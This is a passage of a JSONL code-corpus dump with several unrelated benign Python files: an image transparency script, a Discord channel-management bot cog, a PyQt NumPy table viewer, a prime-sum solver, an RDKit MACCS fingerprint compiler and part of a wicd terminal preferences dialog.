print(\"EndTime:{}\".format(end_time))\n print(\"TimeCost:{}\".format(end_time - start_time))\n\n if show_response:\n print(\"Return:\" + resp[:content_limit])\n\n return resp\n\n return wrapper\n return make_wrapper","repo_name":"JayceSYH/FactorKeeper","sub_path":"FactorKeeper/Util/ServiceUtil/Debug.py","file_name":"Debug.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20135579332","text":"from PIL import Image\n\nwidth = 940\nheight = 1024\n\n# put source image\nsrc = Image.open('src/source_image.png')\nstartImageHeightList = []\n\noriginPixel = src.getpixel((0,0))\n\nfor x in range(width):\n startImageHeight = 0\n for y in range(int(height/2)):\n pixel = src.getpixel((x, y))\n if originPixel == pixel:\n startImageHeight = y + 1\n continue\n else:\n break\n \n startImageHeightList.append(startImageHeight)\n\nlatterBlankStartList = []\nfor x in range(width):\n latterStartImageHeight = 0\n for y in range(int(height/2)):\n h = 1023 - y\n pixel = src.getpixel((x, h))\n if pixel == originPixel:\n latterStartImageHeight = h - 1\n continue\n else:\n break\n \n latterBlankStartList.append(latterStartImageHeight)\n\nfor i in range(256):\n # put appropriate folder name contains reading images\n src = Image.open('dst_iamges/' + str(i) + '.png')\n\n newImage = Image.new('RGBA', (width, height), (0,0,0,1))\n for x in range(width):\n for y in range(height):\n pixel = src.getpixel((x, y))\n if y < startImageHeightList[x] or y > latterBlankStartList[x]:\n continue\n\n newImage.putpixel((x,y), pixel)\n \n # put target folder name to export image files\n newImage.save('dst_target/' + str(i) + '.png')\n\nprint(\"Finished.\")\n","repo_name":"UnUniFi/nft","sub_path":"genesis-nft/scripts/make_background_transparent.py","file_name":"make_background_transparent.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74199598247","text":"import discord\t\r\nfrom discord import app_commands\r\nfrom discord.ext import commands\r\nfrom discord.components import *\r\nimport asyncio\r\nimport re\r\n# import io\r\n# import requests\r\n# import pytesseract\r\n# from PIL import Image\r\nimport datetime\r\nimport pytz\r\nimport data\r\n\r\nclass ChannelType(commands.Cog):\r\n\tdef __init__(self,bot):\r\n\t\tself.bot = bot\r\n\r\n\r\n\t@commands.command(name=\"ping\",pass_context=True)\r\n\t@commands.has_role(\"Admin\")\r\n\tasync def ping(self,ctx):\r\n\t\tchannel = botChannel(self.bot,ctx)\r\n\t\tawait channel.run()\r\n\r\nclass botChannel:\r\n\tdef __init__(self,bot,ctx):\r\n\t\tself._bot = bot\r\n\t\tself._ctx = ctx\r\n\t\tself._finish = False\r\n\r\n\tasync def inputName(self,msg,error):\r\n\t\tawait self._channel.send(msg)\r\n\t\tdef check(m):\r\n\t\t\treturn m.author.id == 586169972384858123\r\n\t\twhile True:\r\n\t\t\tmessage = await self._bot.wait_for(\"message\",check=check)\r\n\t\t\tif len(message.content) < 15:\r\n\t\t\t\treturn message.content\r\n\t\t\tawait self._channel.send(error)\r\n\t\r\n\tasync def inputInt(self,msg,error):\r\n\t\tawait self._channel.send(msg)\r\n\t\tdef check(m):\r\n\t\t\treturn m.author.id == 586169972384858123\r\n\t\twhile True:\r\n\t\t\ttry:\r\n\t\t\t\tmessage = await self._bot.wait_for(\"message\",check=check)\r\n\t\t\t\treturn int(message.content)\r\n\t\t\texcept ValueError:\r\n\t\t\t\tawait self._channel.send(error)\r\n\r\n\tasync def inputFloat(self,msg,error):\r\n\t\tawait self._channel.send(msg)\r\n\t\tdef check(m):\r\n\t\t\treturn m.author.id == 586169972384858123\r\n\t\twhile True:\r\n\t\t\ttry:\r\n\t\t\t\tmessage = await self._bot.wait_for(\"message\",check=check)\r\n\t\t\t\treturn float(message.content)\r\n\t\t\texcept ValueError:\r\n\t\t\t\tawait self._channel.send(error)\r\n\r\n\tasync def inputValidator(self,pattern,msg,error):\r\n\t\tawait self._channel.send(msg)\r\n\t\tdef check(m):\r\n\t\t\treturn m.author.id == 586169972384858123\r\n\t\twhile True:\r\n\t\t\tmessage = await self._bot.wait_for(\"message\",check=check)\r\n\t\t\tif re.match(pattern=pattern,string=message.content,flags=re.IGNORECASE):\r\n\t\t\t\treturn str(message.content).lower()\r\n\t\t\tawait self._channel.send(error)\r\n\r\n\tasync def run(self):\r\n\t\tcategory = discord.utils.get(self._ctx.guild.categories, name=\"🔰┃Internal\")\r\n\r\n\t\tself._channel = await category.create_text_channel(name=\"Settings\",overwrites={self._ctx.author: discord.PermissionOverwrite(view_channel=True,read_message_history=True,send_messages=True,read_messages=True)})\r\n\t\ttimeout_task = asyncio.create_task(self.timeout())\r\n\t\tgetSettings_task = asyncio.create_task(self.getSettings())\r\n\t\tawait asyncio.gather(\r\n timeout_task,\r\n\t\tgetSettings_task\r\n \t)\r\n\r\n\tasync def timeout(self):\r\n\t\tawait asyncio.sleep(60*2)\r\n\t\tif not self._finish:\r\n\t\t\tawait self._channel.delete()\r\n\r\n\tasync def getSettings(self):\r\n\t\tname = await self.inputName(\"Input the name of channel: \",\"Faild!!Re-input the name: \")\r\n\t\tuser_id = await self.inputInt(\"Input the user ID: \",\"Faild!!Re-input the user ID: \")\r\n\t\tbot_id = await self.inputInt(\"Input the bot ID: \",\"Faild!!Re-input the bot ID: \")\r\n\t\ttime = await self.inputFloat(\"Input the usage time: \",\"Faild!!Re-input the usage time: \")\r\n\t\ttype = await self.inputValidator(r\"default\",\"Input the type(Default/Medium/Premium): \",\"Faild!!Re-input the type(Default/Medium/Premium): \")\r\n\t\tchannel = default(self._bot,self._ctx,name,user_id,bot_id,time)\r\n\t\tawait channel.new()\r\n\t\tasyncio.create_task(channel.run())\r\n\t\tself._finish = True\r\n\t\tawait self._channel.delete()\r\n\t\t\r\nclass Channel:\r\n\tdef __init__(self,bot,ctx,name,user_id,bot_id,time):\r\n\t\tself._bot = bot\r\n\t\tself._ctx = ctx\r\n\t\tself._channel = None\r\n\t\tself._time = time\r\n\t\tself._user = user_id\r\n\t\tself._bot_user = bot_id\r\n\t\tself._name = name\r\n\r\n\tasync def new(self):\r\n\t\tcategory = discord.utils.get(self._ctx.guild.categories, name=\"âš” ┃ Tool\")\r\n\t\tself._user = self._bot.get_user(self._user)\r\n\t\tself._bot_user = self._bot.get_user(self._bot_user)\r\n\t\tself._channel = await category.create_text_channel(name=self._name)\r\n\t\tawait self._channel.edit(sync_permissions=True)\r\n\t\tawait self._channel.set_permissions(self._user,view_channel=True,read_message_history=True,send_messages=True,embed_links=True,attach_files=True,send_messages_in_threads=True,use_application_commands=True)\r\n\t\tawait self._channel.set_permissions(self._bot_user,view_channel=True,attach_files=True,read_message_history=True,send_messages=True)\r\n\t\tawait self._channel.create_thread(name=\"Writing\",type=discord.ChannelType.public_thread)\r\n\r\n\tasync def notification(self):\r\n\t\tchannel_view = self._bot.get_channel(data.channel_view)\r\n\t\tself.timeOpen = datetime.datetime.now(pytz.timezone('Asia/Ho_Chi_Minh'))\r\n\t\tself.timeDelete = self.timeOpen + datetime.timedelta(hours=self._time)\r\n\t\tembed = discord.Embed(title=f\":satellite: Channel Info\",description=f\"{self._channel.mention}\",colour=discord.Colour.green())\r\n\t\tembed.set_author(name=f\"{self._channel}\",icon_url=\"https://cdn.discordapp.com/icons/1031519954811494462/bdff3995b5f588e544750b06dc05a49b.webp?size=100\")\r\n\t\tembed.add_field(name=\":id:\",value=f\"{self._channel.id}\")\r\n\t\tembed.add_field(name=\":page_facing_up: Status\",value=f\":white_check_mark: Open\",inline=True)\r\n\t\tembed.add_field(name=\":bust_in_silhouette: Author\",value=f\"{self._user.mention}\",inline=True)\r\n\t\tembed.add_field(name=\":hourglass: Open at\",value=f\"{self.timeOpen}\",inline=True)\r\n\t\tembed.add_field(name=\":hourglass: Detele at\",value=f\"{self.timeDelete}\",inline=True)\r\n\t\tself.notice = await channel_view.send(embed = embed)\r\n\r\n\tasync def notification_finish(self):\r\n\t\tembed2 = discord.Embed(title=f\":satellite: Channel Info\",description=f\"{self._channel.mention}\",colour=discord.Colour.red())\r\n\t\tembed2.set_author(name=f\"{self._channel}\",icon_url=\"https://cdn.discordapp.com/icons/1031519954811494462/bdff3995b5f588e544750b06dc05a49b.webp?size=100\")\r\n\t\tembed2.add_field(name=\":id:\",value=f\"{self._channel.id}\")\r\n\t\tembed2.add_field(name=\":page_facing_up: Status\",value=f\":x: Deleted\")\r\n\t\tembed2.add_field(name=\":bust_in_silhouette: Author\",value=f\"{self._user.mention}\",inline=True)\r\n\t\tembed2.add_field(name=\":hourglass: Open at\",value=f\"{self.timeOpen}\",inline=True)\r\n\t\tembed2.add_field(name=\":hourglass: Detele at\",value=f\"{self.timeDelete}\",inline=True)\r\n\t\tawait self.notice.edit(embed=embed2)\r\n\r\n\r\n\tasync def run(self):\r\n\t\tawait self.notification()\r\n\t\tawait self.timeout()\r\n\t\t\r\n\r\n\tasync def timeout(self):\r\n\t\tawait asyncio.sleep(self._time*60*60)\r\n\t\tawait self.notification_finish()\r\n\t\tawait self._channel.delete()\r\n\t\tself._channel = None\r\n\r\nclass default(Channel):\r\n\tdef __init__(self,bot,ctx,name,user_id,bot_id,time):\r\n\t\tsuper().__init__(bot,ctx,name,user_id,bot_id,time)\r\n\r\n# class medium(Channel):\r\n# \tdef __init__(self,bot,ctx,name,user_id,bot_id,time):\r\n# \t\tsuper().__init__(bot,ctx,name,user_id,bot_id,time)\r\n\r\n# \tasync def run(self):\r\n# \t\tawait asyncio.gather(\r\n# self.timeout(),\r\n# \t\tself.autoMessage()\r\n# \t)\r\n\r\n# \tasync def autoMessage(self):\r\n# \t\tcheckImg = None\r\n# \t\tdef check(m):\r\n# \t\t\treturn m.channel == self._channel\r\n# \t\twhile self._channel is not None:\r\n# \t\t\ttry:\r\n# \t\t\t\tmessage = await self._bot.wait_for(\"message\",check=check)\r\n# \t\t\texcept:\r\n# \t\t\t\tcontinue\r\n# \t\t\tif(message.attachments):\r\n# \t\t\t\tif(message.attachments[0].filename != checkImg and message.attachments[0].content_type == 'image/png'):\r\n# \t\t\t\t\tcheckImg = message.attachments[0].filename\r\n# \t\t\t\telse:\r\n# \t\t\t\t\tawait message.delete()\r\n# \t\t\telse:\r\n# \t\t\t\tcontinue\r\n\t\t\r\n# class premium(Channel):\r\n# \tdef __init__(self,bot,ctx,name,user_id,bot_id,time):\r\n# \t\tself._data = [None] * 50\r\n# \t\tself._path_to_tesseract = r\"C:\\Program Files\\Tesseract-OCR\\tesseract.exe\"\r\n# \t\tself._thread = None\r\n# \t\tself._question25 = None\r\n# \t\tself._question50 = None\r\n# \t\tsuper().__init__(bot,ctx,name,user_id,bot_id,time)\r\n\r\n# \tasync def run(self):\r\n# \t\tself._thread = await self._channel.create_thread(name=\"UI\")\r\n# \t\tquestion = Question()\r\n# \t\tquestion.set_data(self._data)\r\n# \t\tawait question.filter()\r\n# \t\tself._question25 = await self._thread.send(view=question.get_question25())\r\n# \t\tself._question50 = await self._thread.send(view=question.get_question50())\r\n# \t\tawait asyncio.gather(\r\n# self.timeout(),\r\n# \t\tself.autoMessage()\r\n# \t)\r\n\r\n# \tasync def autoMessage(self):\r\n# \t\tcheckImg = None\r\n# \t\tdef check(m):\r\n# \t\t\treturn m.channel == self._channel\r\n# \t\twhile self._channel is not None:\r\n# \t\t\ttry:\r\n# \t\t\t\tmessage = await self._bot.wait_for(\"message\",check=check)\r\n# \t\t\texcept:\r\n# \t\t\t\tcontinue\r\n# \t\t\tif(message.attachments):\r\n# \t\t\t\tif(message.attachments[0].filename != checkImg and message.attachments[0].content_type == 'image/png'):\r\n# \t\t\t\t\tcheckImg = message.attachments[0].filename\r\n# \t\t\t\t\tawait self.img2text(message)\r\n# \t\t\t\telse:\r\n# \t\t\t\t\tawait message.delete()\r\n# \t\t\telse:\r\n# \t\t\t\tcontinue\r\n\r\n# \tasync def update_question(self):\r\n# \t\tquestion = Question()\r\n# \t\tquestion.set_data(self._data)\r\n# \t\tawait question.filter()\r\n# \t\tawait self._question25.edit(view=question.get_question25())\r\n# \t\tawait self._question50.edit(view=question.get_question50())\r\n\r\n# \tasync def img2text(self,message):\r\n# \t\tresponse = requests.get(url=message.attachments[0].proxy_url)\r\n# \t\timg = Image.open(io.BytesIO(response.content))\r\n# \t\tleft = 90\r\n# \t\ttop = 27\r\n# \t\tright = 1927\r\n# \t\tbottom = 810\r\n# \t\timg = img.crop((left, top, right, bottom))\r\n# \t\tpytesseract.pytesseract.tesseract_cmd = self._path_to_tesseract\r\n# \t\ttext = pytesseract.image_to_string(img,lang=\"eng\",config='--oem 3 --psm 6')\r\n# \t\tawait self.checkText(f\"{text}\\n{message.attachments[0].proxy_url}\")\r\n\r\n# \tasync def checkText(self,message):\r\n# \t\tcheck = re.search('Multiple choices (\\d+)/',message)\r\n# \t\tif(check == None):\r\n# \t\t\treturn\r\n# \t\telse:\r\n# \t\t\tself._data[int(check.group(1))-1] = f\"{message}\"\r\n# \t\t\tawait self.update_question()\r\n\r\n\r\n# class Question:\r\n# \tdef __init__(self):\r\n# \t\tself._question25 = Question25()\r\n# \t\tself._question50 = Question50()\r\n# \t\tself._data = [None] * 50\r\n\r\n# \tdef set_data(self,data):\r\n# \t\tself._data = data\r\n\r\n# \tasync def filter(self):\r\n# \t\tdata25,data50 = self._data[:25],self._data[25:]\r\n# \t\tself._question25.set_data(data25)\r\n# \t\tself._question50.set_data(data50)\r\n# \t\tawait self._question25.create_button()\r\n# \t\tawait self._question50.create_button()\r\n\r\n# \tdef get_question25(self):\r\n# \t\treturn self._question25\r\n\r\n# \tdef get_question50(self):\r\n# \t\treturn self._question50\r\n\r\n\r\n\r\n# class Question25(discord.ui.View):\r\n# \tdef __init__(self):\r\n# \t\tsuper().__init__()\r\n# \t\tself._data = [None] * 25\r\n\r\n# \tdef set_data(self,data):\r\n# \t\tself._data = data\r\n\r\n# \tasync def create_button(self):\r\n# \t\tfor i in range(25):\r\n# \t\t\tif(self._data[i] != None):\r\n# \t\t\t\tbutton = Button(f\"{i+1}\",discord.ButtonStyle.green)\r\n# \t\t\telse:\r\n# \t\t\t\tbutton = Button(f\"{i+1}\",discord.ButtonStyle.grey)\r\n# \t\t\tbutton.data = self._data[i]\r\n# \t\t\tself.add_item(button)\r\n\r\n# class Question50(discord.ui.View):\r\n# \tdef __init__(self):\r\n# \t\tsuper().__init__()\r\n# \t\tself._data = [None] * 25\r\n\r\n# \tdef set_data(self,data):\r\n# \t\tself._data = data\r\n\r\n# \tasync def create_button(self):\r\n# \t\tfor i in range(25):\r\n# \t\t\tif(self._data[i] != None):\r\n# \t\t\t\tbutton = Button(f\"{i+26}\",discord.ButtonStyle.green)\r\n# \t\t\telse:\r\n# \t\t\t\tbutton = Button(f\"{i+26}\",discord.ButtonStyle.grey)\r\n# \t\t\tbutton.data = self._data[i]\r\n# \t\t\tself.add_item(button)\r\n\r\n\r\n# class Button(discord.ui.Button):\r\n# \tdef __init__(self,label,style):\r\n# \t\tsuper().__init__(label=label,style=style)\r\n\r\n# \tasync def callback(self, interaction: discord.Interaction):\r\n# \t\tawait interaction.response.edit_message(content=self.data)\r\n\r\n\r\nasync def setup(bot:commands.Bot):\r\n\tawait bot.add_cog(ChannelType(bot))","repo_name":"nminhdangit/DiscordBot","sub_path":"cogs/ChannelType.py","file_name":"ChannelType.py","file_ext":"py","file_size_in_byte":11396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8643452834","text":"import numpy as np\n\nfrom PyQt5.QtWidgets import (QApplication, QTableView, QTreeView,\n QMainWindow, QWidget, QGridLayout, QPushButton, QMenu)\nfrom PyQt5.QtCore import (Qt, QAbstractTableModel, QModelIndex)\n\n\nclass NpModel(QAbstractTableModel):\n def __init__(self, data=np.array([[]])):\n super().__init__()\n self.npdata = data\n\n def rowCount(self, index=QModelIndex()):\n return len(self.npdata)\n\n def columnCount(self, index=QModelIndex()):\n return len(self.npdata[0])\n\n def data(self, index, role):\n if not index.isValid() or role != Qt.DisplayRole:\n return None\n val = self.npdata[index.row()][index.column()]\n return str(round(val, 4))\n\n def headerData(self, section, orientation, role):\n if role != Qt.DisplayRole: return None\n if orientation == Qt.Vertical:\n return 'Строка ' + str(section)\n else:\n return 'Столбец ' + str(section)\n\n def set(self, arr=np.array([[]])):\n self.beginResetModel()\n self.npdata = arr\n self.endResetModel()\n self.layoutChanged.emit()\n\n def get(self):\n return self.npdata\n\n\nclass NpTable(QMainWindow):\n def __init__(self, data=np.array([[]]), parent=None):\n super().__init__()\n self.model = NpModel()\n self.view = QTableView()\n self.view.setModel(self.model)\n self.view.horizontalHeader().setSectionResizeMode(1)\n self.btnLoad = QPushButton(\"Reload\")\n self.btnCalc = QPushButton(\"Calc\")\n self.btnGet = QPushButton('Get')\n self.btnLoad.clicked.connect(self.reload)\n self.btnCalc.clicked.connect(self.calc)\n self.btnGet.clicked.connect(self.get_data)\n wgt = QWidget()\n grid = QGridLayout(wgt)\n grid.setContentsMargins(0, 0, 0, 0)\n grid.addWidget(self.view, 0, 0, 4, 4)\n grid.addWidget(self.btnLoad, 4, 0, 1, 1)\n grid.addWidget(self.btnCalc, 4, 1, 1, 1)\n grid.addWidget(self.btnGet, 4, 3, 1, 1)\n self.setCentralWidget(wgt)\n self.load(data)\n\n def reload(self):\n self.model.set(self.data.copy())\n\n def load(self, data=np.array([[]])):\n self.data = data\n self.model.set(data.copy())\n\n def calc(self):\n rows = self.model.rowCount()\n cols = self.model.columnCount()\n for i in range(rows):\n for j in range(cols):\n self.model.npdata[i][j] /= (j + 2)\n self.model.layoutChanged.emit()\n\n def get_data(self):\n print(repr(self.model.get()))\n\n def contextMenuEvent(self, event):\n indexes = [(i.row(), i.column()) for i in self.view.selectionModel().selectedIndexes()]\n self.statusBar().showMessage(str(indexes))\n mnu = QMenu()\n mnu.addAction('x10').setObjectName('calc10')\n mnu.addAction('x100').setObjectName('calc100')\n pos = self.view.mapToGlobal(event.pos())\n ret = mnu.exec_(pos)\n if ret:\n num = 0\n obj = ret.objectName()\n if obj == 'calc10':\n num = 10\n elif obj == 'calc100':\n num = 100\n if num:\n for ind in indexes: self.model.npdata[ind] *= num\n index = self.model.index(-1, -1)\n self.view.setCurrentIndex(index)\n self.model.layoutChanged.emit()\n self.statusBar().showMessage('')\n\n\nmass = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9], [10, 11, 12], [13, 14, 15]], float)\n\nif __name__ == \"__main__\":\n app = QApplication([])\n w = NpTable()\n w.load(mass)\n w.resize(600, 400)\n w.move(0, 0)\n w.show()\n app.exec_()","repo_name":"Aisberg-D/ARestaurant","sub_path":"deleted/etable2.py","file_name":"etable2.py","file_ext":"py","file_size_in_byte":3672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35748358161","text":"import sys\ninput = sys.stdin.readline\n\nn= int(input())\nprime = []\nsieve = [False,False] + [True]*(n-1)\n\ndef getPrimes(n):\n for i in range(2,n+1):\n if sieve[i]:\n for j in range(i*2,n+1,i):\n sieve[j] = False\n\n for num in range(n+1):\n if sieve[num]:\n prime.append(num)\n\ngetPrimes(n)\nwindow_start, window_sum = 0,0\nans = 0\nfor window_end in range(len(prime)):\n window_sum += prime[window_end]\n if window_sum == n:\n ans += 1\n while window_sum >= n:\n window_sum -= prime[window_start]\n window_start += 1\n if window_sum == n:\n ans += 1\n\nprint(ans)","repo_name":"jihoonyou/problem-solving-2","sub_path":"boj/1644_소수의 연속합.py","file_name":"1644_소수의 연속합.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17024825664","text":"from argparse import ArgumentParser\nimport re\nimport os\nimport networkx as nx\nimport numpy as np\nimport pickle\nfrom rdkit import Chem\nfrom rdkit.Chem import MACCSkeys \nfrom rdkit import DataStructs\n\ndef get_mol(mol_dir, compound_number):\n molfile = os.path.join(mol_dir, compound_number + '.mol')\n if not os.path.exists(molfile):\n print(\"Cannot find *.mol file for %s.\" % compound_number)\n return None\n m = Chem.MolFromMolFile(molfile)\n if m is None:\n print(\"could not generate Mol from *.mol file for node\", compound_number)\n return m\n\ndef get_maccs_fingerprint_from_mol(m):\n if m is None: return None\n k = MACCSkeys.GenMACCSKeys(m)\n textk = DataStructs.BitVectToText(k)\n binaryvec = np.array(list(map(int, textk)))\n return binaryvec\n\ndef get_pubchem_fingerprint_from_mol(m):\n if m is None: return None\n smile = Chem.MolToSmiles(m)\n return smile\n\ndef compile_maccs_fingerprints(compounds, mol_dir, output_file=None):\n maccs = {}\n for c in compounds:\n fp = get_maccs_fingerprint_from_mol(get_mol(mol_dir, c))\n if fp is not None:\n maccs[c] = fp\n print('%d/%d compounds have MACCS fingerprints' % (len(maccs), len(compounds)))\n if output_file is not None:\n with open(output_file, 'wb') as f:\n pickle.dump(maccs, f)\n print('Dumped to', output_file)\n return maccs\n\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser.add_argument(\n '--mol_dir', \n help='A valid path to the directory ligand/compound/mol, ' + \\\n 'where each compound has a CXXXXX.mol file.',\n default='%s/kegg/Ligand_April_20_2020/compound/mol'\\\n % os.environ['DATAPATH'])\n parser.add_argument(\n '--kegg_edgelist',\n default='%s/kegg/kegg_2020.edgelist' % os.environ['DATAPATH'])\n parser.add_argument(\n '--maccs_file',\n default='%s/kegg/kegg_2020_maccs_fp.pkl' % os.environ['DATAPATH'])\n args = parser.parse_args() \n G = nx.read_edgelist(args.kegg_edgelist)\n compile_maccs_fingerprints(G.nodes, args.mol_dir, args.maccs_file)\n","repo_name":"HassounLab/ELP","sub_path":"preprocessing/compile_maccs_fp.py","file_name":"compile_maccs_fp.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"17286516942","text":"import urwid\nimport urwid.curses_display\n\nfrom wicd import misc\nfrom wicd.translations import _\nfrom curses_misc import SelText, DynWrap, DynRadioButton, ComboBox, TabColumns\n\ndaemon = None\nwireless = None\nwired = None\n\n\nclass PrefsDialog(urwid.WidgetWrap):\n \"\"\" Preferences dialog. \"\"\"\n # pylint: disable-msg=W0231\n def __init__(self, body, pos, ui, dbus=None):\n global daemon, wireless, wired\n\n self.thebackends = None\n self.backends = None\n self.wpadrivers = None\n self.thedrivers = None\n\n daemon = dbus['daemon']\n wireless = dbus['wireless']\n wired = dbus['wired']\n\n width, height = ui.get_cols_rows()\n height -= 3\n #width = 80\n #height = 20\n # Stuff that goes at the top\n\n header0_t = _('General Settings')\n header1_t = _('External Programs')\n header2_t = _('Advanced Settings')\n self.header0 = urwid.AttrWrap(SelText(header0_t), 'tab active', 'focus')\n self.header1 = urwid.AttrWrap(SelText(header1_t), 'body', 'focus')\n self.header2 = urwid.AttrWrap(SelText(header2_t), 'body', 'focus')\n title = ('Preferences')\n\n # Blank line\n _blank = urwid.Text('')\n\n ####\n #### Text in the widgets\n ####\n\n # General Settings\n net_cat_t = ('header', ('Network Interfaces'))\n wired_t = ('editcp', ('Wired Interface') + ': ')\n wless_t = ('editcp', ('Wireless Interface') + ':')\n always_show_wired_t = _('Always show wired interface')\n prefer_wired_t = _('Always switch to wired connection when available')\n\n global_dns_cat_t = ('header', _('Global DNS servers'))\n global_dns_t = ('editcp', _('Use global DNS servers'))\n dns_dom_t = ('editcp', ' ' + _('DNS domain') + ': ')\n search_dom_t = ('editcp', ' ' + _('Search domain') + ':')\n dns1_t = ('editcp', ' ' + _('DNS server') + ' 1: ')\n dns2_t = ('editcp', ' ' + _('DNS server') + ' 2: ')\n dns3_t = ('editcp', ' ' + _('DNS server') + ' 3: ')\n\n wired_auto_cat_t = ('header', _('Wired Autoconnect Settings'))\n wired_auto_1_t = _('Use default profile on wired autoconnect')\n wired_auto_2_t = _('Prompt for profile on wired autoconnect')\n wired_auto_3_t = _('Use last used profile on wired autoconnect')\n\n auto_reconn_cat_t = ('header', _('Automatic Reconnection'))\n auto_reconn_t = _('Automatically reconnect on connection loss')\n\n #### External Programs\n automatic_t = _('Automatic (recommended)')\n\n dhcp_header_t = ('header', _('DHCP Client'))\n # Automatic\n dhcp1_t = 'dhclient'\n dhcp2_t = 'dhcpcd'\n dhcp3_t = 'pump'\n dhcp4_t = 'udhcpc'\n\n wired_detect_header_t = ('header', _('Wired Link Detection'))\n wired1_t = 'ethtool'\n wired2_t = 'mii-tool'\n\n flush_header_t = ('header', _('Route Table Flushing'))\n flush1_t = 'ip'\n flush2_t = 'route'\n\n #### Advanced Settings\n wpa_cat_t = ('header', _('WPA Supplicant'))\n wpa_t = ('editcp', 'Driver:')\n wpa_list = []\n wpa_warn_t = ('important',\n _('You should almost always use wext as the WPA supplicant driver'))\n\n backend_cat_t = ('header', _('Backend'))\n backend_t = _('Backend') + ':'\n backend_list = []\n\n debug_cat_t = ('header', _('Debugging'))\n debug_mode_t = _('Enable debug mode')\n\n wless_cat_t = ('header', _('Wireless Interface'))\n use_dbm_t = _('Use dBm to measure signal strength')\n verify_ap_t = \\\n _('Ping static gateways after connecting to verify association')\n\n ####\n #### UI Widgets\n ####\n\n # General Settings\n self.net_cat = urwid.Text(net_cat_t)\n self.wired_edit = \\\n urwid.AttrWrap(urwid.Edit(wired_t), 'editbx', 'editfc')\n self.wless_edit = \\\n urwid.AttrWrap(urwid.Edit(wless_t), 'editbx', 'editfc')\n self.prefer_wired_chkbx = urwid.CheckBox(prefer_wired_t)\n self.global_dns_cat = urwid.Text(global_dns_cat_t)\n # Default the global DNS settings to off. They will be reenabled later\n # if so required.\n global_dns_state = False\n self.global_dns_checkb = urwid.CheckBox(global_dns_t,\n global_dns_state,\n on_state_change=self.global_dns_trigger\n )\n self.search_dom = DynWrap(urwid.Edit(search_dom_t), global_dns_state)\n self.dns_dom = DynWrap(urwid.Edit(dns_dom_t), global_dns_state)\n self.dns1 = DynWrap(urwid.Edit(dns1_t), global_dns_state)\n self.dns2 = DynWrap(urwid.Edit(dns2_t), global_dns_state)\n self.dns3 = DynWrap(urwid.Edit(dns3_t), global_dns_state)\n\n self.always_show_wired_checkb = urwid.CheckBox(always_show_wired_t)\n\n self.wired_auto_l = []\n self.wired_auto_cat = urwid.Text(wired_auto_cat_t)\n self.wired_auto_1 = urwid.RadioButton(self.wired_auto_l, wired_auto_1_t)\n self.wired_auto_2 = urwid.RadioButton(self.wired_auto_l, wired_auto_2_t)\n self.wired_auto_3 = urwid.RadioButton(self.wired_auto_l, wired_auto_3_t)\n\n self.auto_reconn_cat = urwid.Text(auto_reconn_cat_t)\n self.auto_reconn_checkb = urwid.CheckBox(auto_reconn_t)\n generalLB = urwid.ListBox([\n self.net_cat,\n self.wless_edit, # _blank,\n self.wired_edit,\n self.always_show_wired_checkb,\n self.prefer_wired_chkbx, _blank,\n self.global_dns_cat,\n self.global_dns_checkb, # _blank,\n self.search_dom, self.dns_dom,\n self.dns1, self.dns2, self.dns3, _blank,\n self.wired_auto_cat,\n self.wired_auto_1,\n self.wired_auto_2,\n self.wired_auto_3, _blank,\n self.auto_reconn_cat,\n self.auto_reconn_checkb\n ])\n\n #### External Programs tab\n automatic_t = _('Automatic (recommended)')\n\n self.dhcp_header = urwid.Text(dhcp_header_t)\n self.dhcp_l = []\n\n # Order of these is flipped in the actual interface,\n # (2, 3, 1 -> dhcpcd, pump, dhclient), because dhclient often doesn't\n # like to work on several distros.\n self.dhcp0 = urwid.RadioButton(self.dhcp_l, automatic_t)\n self.dhcp1 = DynRadioButton(self.dhcp_l, dhcp1_t)\n self.dhcp2 = DynRadioButton(self.dhcp_l, dhcp2_t)\n self.dhcp3 = DynRadioButton(self.dhcp_l, dhcp3_t)\n self.dhcp4 = DynRadioButton(self.dhcp_l, dhcp4_t)\n self.dhcp_l = [\n self.dhcp0, self.dhcp1, self.dhcp2, self.dhcp3, self.dhcp4\n ]\n\n self.wired_l = []\n self.wired_detect_header = urwid.Text(wired_detect_header_t)\n self.wired0 = urwid.RadioButton(self.wired_l, automatic_t)\n self.wired1 = DynRadioButton(self.wired_l, wired1_t)\n self.wired2 = DynRadioButton(self.wired_l, wired2_t)\n self.wired_l = [self.wired0, self.wired1, self.wired2]\n\n self.flush_l = []\n self.flush_header = urwid.Text(flush_header_t)\n self.flush0 = urwid.RadioButton(self.flush_l, automatic_t)\n self.flush1 = DynRadioButton(self.flush_l, flush1_t)\n self.flush2 = DynRadioButton(self.flush_l, flush2_t)\n self.flush_l = [self.flush0, self.flush1, self.flush2]\n\n externalLB = urwid.ListBox([\n self.dhcp_header,\n self.dhcp0, self.dhcp2, self.dhcp3, self.dhcp1, self.dhcp4,\n _blank,\n self.wired_detect_header,\n self.wired0, self.wired1, self.wired2,\n _blank,\n self.flush_header,\n self.flush0, self.flush1, self.flush2\n ])\n\n #### Advanced settings\n self.wpa_cat = urwid.Text(wpa_cat_t)\n self.wpa_cbox = ComboBox(wpa_t)\n self.wpa_warn = urwid.Text(wpa_warn_t)\n\n self.backend_cat = urwid.Text(backend_cat_t)\n self.backend_cbox = ComboBox(backend_t)\n\n self.debug_cat = urwid.Text(debug_cat_t)\n self.debug_mode_checkb = urwid.CheckBox(debug_mode_t)\n\n self.wless_cat = urwid.Text(wless_cat_t)\n self.use_dbm_checkb = urwid.CheckBox(use_dbm_t)\n self.verify_ap_checkb = urwid.CheckBox(verify_ap_t)\n\n advancedLB = urwid.ListBox([\n self.wpa_cat,\n self.wpa_cbox, self.wpa_warn, _blank,\n self.backend_cat,\n self.backend_cbox, _blank,\n self.debug_cat,\n self.debug_mode_checkb, _blank,\n self.wless_cat,\n self.use_dbm_checkb, _blank,\n 